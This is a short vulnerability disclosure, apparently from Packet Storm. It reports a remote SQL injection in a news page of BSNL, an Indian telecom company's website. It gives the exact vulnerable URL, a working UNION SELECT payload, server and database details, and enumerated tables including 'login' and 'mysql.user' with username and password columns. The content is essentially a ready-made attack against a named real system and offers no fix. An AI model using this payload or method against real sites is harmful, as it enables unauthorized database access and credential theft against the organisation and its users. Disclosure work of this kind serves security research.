Bharat Sanchar Nigam Ltd., a large telecommunications company in India, suffers from a remote SQL injection vulnerability.
0bbb6f52b14cee8ffdf1703e8953128f828aed46d8ddd27acb29e2f72edf36af-----------------------------------------------------------------------------------------------
[+] Indian Telcome Compny BSNL suffers from a remote SQL injection
vulnerability
[+] Author: Rohit Bansal
---------------------------------------------------------------------------------------
Host Information
Server = Apache/2.0.46 (Red Hat)
Version = 4.1.13-standard
Powered by = PHP/4.3.2
Current User = root@localhost
Current Database = bsnl
Supports Union = yes
Union Columns = 17
Url| http://www.bsnl.co.in/newsdetailed.php?news_id=371
Vuln: http://www.bsnl.co.in/newsdetailed.php?news_id=371+and+1=0+ and 1=0
Union Select 1 , UNHEX(HEX([visible]))
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Comment: --
Visible Column: 2
Hexed: True
Cookie:
Keyword:
Param:
Database:
Tables:login
login
mysql.useR
news
user
Columns: Table login
username
password
---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec,Evilfinger
---------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed